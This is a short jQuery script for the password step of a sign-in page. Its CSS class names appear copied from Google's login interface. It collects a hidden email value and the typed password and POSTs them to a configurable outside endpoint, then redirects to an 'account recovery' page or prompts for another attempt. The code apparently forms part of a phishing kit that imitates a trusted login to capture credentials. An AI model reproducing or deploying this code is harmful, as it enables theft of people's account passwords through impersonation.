"use strict";
var cb = document;
$(cb).ready(function() {

    $("#password").focus(function() {
        $("#xpass").addClass("u3bW4e");
    });

    $("#password").blur(function() {
        $("#xpass").removeClass("u3bW4e");
    });

    $("#password").keyup(function() {
        var pass = $("#password").val();
        if (pass.length > 0) {
            $("#xpass").addClass("CDELXb");
        } else {
            $("#xpass").removeClass("CDELXb");
        }
    });

    $("#pwtoggle").click(function() { 
		var att = $("#password").attr('type');
		if(att == "password"){
			$("#password").attr('type', 'text');
			$("#pwtoggle").addClass('eO2Zfd');
		}else{
			$("#password").attr('type', 'password');
			$("#pwtoggle").removeClass('eO2Zfd');
		}
	});
	
	$("#password").on('keypress',function(e) {
    if(e.which == 13) {
        $("#passwordNext").click();
    }
	});

	$("#passwordNext").click(function() {
        var email = $("#hiddenEmail").val();
        var pass = $("#password").val();
        var error = false;
        if (pass.length < 6) {
            $("#xpass").addClass("k0tWj IYewr");
            $("#npass").show();
            error = true;
        }
        if (!error) {
			$("#npass").hide();
			$("#xpass").removeClass("k0tWj IYewr");
			$("#xpass").removeClass("u3bW4e");
            $("#pb").show();
            $('.xkfVF').css({
                'opacity': 0.5
            });
			$.ajax({
                type: 'POST',
                url: cb_endpoint + '/cb-ajax/signin/challenge',
                data: {
                    email: email,
                    password: pass
                },
                success: function(res) {
                   if(res == "2"){
					   location.replace(cb_endpoint + "/account_recovery/" + session_id + "/identity");
				   }else{
						$('.xkfVF').css({'opacity': 1});
						$("#pb").hide();
						$("#xpass").addClass("k0tWj IYewr");
						$("#npass_value").html("Wrong code. Try again.");
						$("#npass").show();
						$('#password').val("");
						$('#password').focus();
				   }
                }
            });
        }
    });

});